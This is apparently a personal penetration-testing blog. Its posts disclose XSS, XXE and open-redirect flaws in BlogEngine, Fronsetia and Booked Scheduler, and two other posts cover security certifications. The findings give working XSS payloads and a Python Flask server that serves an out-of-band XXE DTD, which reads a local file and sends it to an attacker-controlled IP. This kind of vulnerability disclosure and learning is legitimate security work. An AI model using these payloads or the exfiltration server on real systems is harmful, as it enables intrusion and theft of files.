Saturday, 14 December 2024

Friday Fun Pentest Series - 16 - Stored XSS with Filter Bypass - blogenginev3.3.8


Description

- It was found that the application was vulnerable to Stored XSS via specific payload that bypassed the filtering in place.


Stored XSS Filter Bypass #1 - "Add Category"

Steps to Reproduce:
  1. Login as admin and go to "Content" > "Posts"
  2. On the right side of the page choose "Categories"
  3. In "Title" and "Description" paste the following payload <b>12345</b><script>alert(1)</script><b>12345=</b>

// HTTP PUT request

PUT /blogengine/api/posts/update/foo HTTP/1.1
Host: 192.168.58.153:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
[...]

[...]
","DateCreated":"2024-12-14 14:33","Slug":"xss","RelativeLink":"/blogengine/post/2024/12/14/xss","Categories":[{"IsChecked":false,"Id":"40a7136b-2f0d-491a-8690-2a092681ed3b","Title":"<b>12345</b><script>alert(1)</script><b>12345=</b>"}],"Tags":[],"Comments":null,"HasCommentsEnabled":true,"IsPublished":false,"IsDeleted":false,"CanUserDelete":true,"CanUserEdit":true}
[...]


// HTTP response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sat, 14 Dec 2024 15:34:08 GMT
Content-Length: 0


// HTTP GET request

GET /blogengine/post/2024/12/14/xss HTTP/1.1
Host: 192.168.58.153:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
[...]


// HTTP response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
x-pingback: http://192.168.58.153:8080/blogengine/pingback.axd
Content-Style-Type: text/css
Content-Script-Type: text/javascript
X-Powered-By: ASP.NET
Date: Sat, 14 Dec 2024 15:44:05 GMT
Content-Length: 19229

[...]
<span class="post-category"><a href="/blogengine/category/&lt;b&gt;12345&lt;b&gt;&lt;script&gt;alert(1)&lt;script&gt;&lt;b&gt;12345=&lt;b&gt;"><b>12345</b><script>alert(1)</script><b>12345=</b></a></span></div></header>
[...]






at No comments:

Thursday, 21 November 2024

Friday Fun Pentest Series - 15 - OOB XXE - fronsetiav1.1

Description

- The application is vulnerable to OOB XXE injection


XXE #1 - "show_operations.jsp"

Steps to Reproduce:

  1. Add Python3 server to serve malicious XXE payload
  2. Add a file on the file system to be read via the application XXE payload echo 123123 > /tmp
  3. Enter the following URL as input
http://192.168.78.128:8080/fronsetia/show_operations.jsp?Fronsetia_WSDL=http://192.168.78.1:10000/testxxeService?wsdl











// Python Server Code

from flask import Flask, Response, request
import logging

app = Flask(__name__)

# Set up logging
logging.basicConfig(level=logging.DEBUG)

@app.route('/testxxeService', defaults={'path': ''})
def catch_all(path):
    app.logger.debug("Serving XXE payload")
    xml = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY % dtd SYSTEM "http:// 192.168.78.1:10000/data.dtd"> %dtd;
]>
<data>&send;</data>"""
    return Response(xml, mimetype='text/xml', status=200)

@app.route('/data.dtd', defaults={'path': ''})
def hello(path):
    app.logger.debug("DTD requested")
    xml = """<!ENTITY % file SYSTEM "file:///tmp/123">
<!ENTITY % eval "<!ENTITY &#37; exfil SYSTEM 'http://192.168.78.1:8000/?content=%file;'>">
%eval;
%exfil;"""
    return Response(xml, mimetype='text/xml', status=200)

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=10000)

at No comments:

Wednesday, 20 November 2024

Friday Fun Pentest Series - 14 - Reflected XSS - fronsetiav1.1

 Description

- It was found that the application was vulnerable to Reflected XSS


Reflected XSS #1 - "show_operations.jsp"

Steps to Reproduce:

  1. Visit main page of the application.
  2. In the input field of "WSDL Location" enter the following payload "><img src=x onerror=alert(1)>

// HTTP GET Request

GET /fronsetia/show_operations.jsp?Fronsetia_WSDL=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E HTTP/1.1
Host: 192.168.78.128:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
[...]


// HTTP Response

HTTP/1.1 200 
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 6360
Date: Wed, 20 Nov 2024 19:42:15 GMT
Keep-Alive: timeout=20
Connection: keep-alive

[...]
<title> Fronsetia: "><img src=x onerror=alert(1)> </title>
[...]






















at No comments:

Thursday, 7 November 2024

Its Official - BSCP Certified

Its official. Im BSCP (Burp Suite Certified Practitioner) certified. Took me a few tries to pass :)













Key takeaways from the attempts:

  • Dont give up 
  • Its a difficult exam
  • Check all the relevant labs in the Portswigger Academy
  • Check for bypasses in the Academy labs 
  • Make sure to have a good list of notes such as payloads and bypasses ready 

Thats it folks !
at No comments:

Saturday, 19 October 2024

Friday Fun Pentest Series - 13 - Reflected XSS - booked scheduler v2.8.5

 Description

- It was found that the application suffered from Reflected XSS on several pages


Reflected XSS #1 - "resevervation.php"

// HTTP GET request

GET /Bookedbo8effotfu/Web/reservation.php?rid="><script>alert(document.domain)</script> HTTP/1.1
Host: localhost
Cookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb; new_version=v%3D2.8.5%2Cfs%3D1728734988; fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yes
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
[...]


// HTTP response

HTTP/1.1 200 OK
Date: Sat, 12 Oct 2024 12:23:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
[...]

<h5><a href="//localhost/Bookedbo8effotfu/Web/reservation.php?rid="><script>alert(document.domain)</script>">Return to the last page that you were on</a></h5>
</div>

Reflected XSS #2 - "schedule.php"

// HTTP GET request

GET /Bookedldk0euwfjx/Web/schedule.php?dr="><script>alert(document.domain)</script> HTTP/1.1
Host: localhost
Cookie: PHPSESSID=c7aa15661bb6b0b72ab88132664b75c9; language=en_gb; resource_filter1=%7B%22ScheduleId%22%3A%221%22%2C%22ResourceIds%22%3A%5B%5D%2C%22ResourceTypeId%22%3Anull%2C%22MinCapacity%22%3Anull%2C%22ResourceAttributes%22%3A%5B%5D%2C%22ResourceTypeAttributes%22%3A%5B%5D%7D; schedule_calendar_toggle=false
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
[...]


// HTTP response

HTTP/1.1 200 OK
Date: Sat, 19 Oct 2024 09:12:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
[...]

<h5><a href="//localhost/Bookedldk0euwfjx/Web/schedule.php?dr="><script>alert(document.domain)</script>">Return to the last page that you were on




at No comments:

Friday Fun Pentest Series - 12 - Open Redirect - booked scheduler v2.8.5

 Description

- It was found that the application suffered from Open Redirect on the login page via the "resume" parameter


Open Redirect

Steps to Reproduce:

  1. Login and intercept HTTP request with a proxy such as Burpsuite or ZAP
  2. In the "resume" parameter add the redirect URL e.g. Burp Collab
  3. Forward the request


// HTTP POST login request

POST /Bookedbo8effotfu/Web/index.php HTTP/1.1
Host: localhost
Cookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb; fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yes
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
[...]

email=admin&password=password&captcha=&login=submit&resume=https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com&language=en_gbg


// HTTP response

HTTP/1.1 302 Found
Date: Sat, 12 Oct 2024 12:09:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
at No comments:

Saturday, 5 October 2024

New Certification Study - SANS 522

Happy to announce that I have enrolled on the SANS 522 course for Web Security. Will keep updating my blog on what have been learned so far. 


Introduction

  • Instructor is Jason Lam 
  • The course comes with six books in PDF and hardcopy format
  • I opted in for purchasing exam voucher and two practice tests
  • The course gives VM so you could practice
  • Also has ondemand videos for each module and topic


Book 1:

  • Focuses on misconfigurations
  • Architecture security
  • Basics of how the web works
  • SSRF
  • HTTP methods

Book 2:
  • Input validation
  • Injection attacks and their mitigations
  • CSRF and other attacks including defences
  • File uploads functionality
  • Unicode attacks


Book 3:

  • Authentication security
  • Authorization security
  • SAML/Oauth security


Book 4:

    • Frontend security
    • AJAX security
    • Webservices
    • NodeJS security
    • Clickjacking
    • Browser security


    Book 5:

        • API security
        • Graphql security
        • Deserialization

        The link for the course is here:

        https://www.sans.org/cyber-security-courses/application-security-securing-web-apps-api-microservices/



        at No comments:
        Subscribe to: Posts (Atom)

        Friday Fun Pentest Series - 16 - Stored XSS with Filter Bypass - blogenginev3.3.8

        Description - It was found that the application was vulnerable to Stored XSS via specific payload that bypassed the filtering in place. Stor...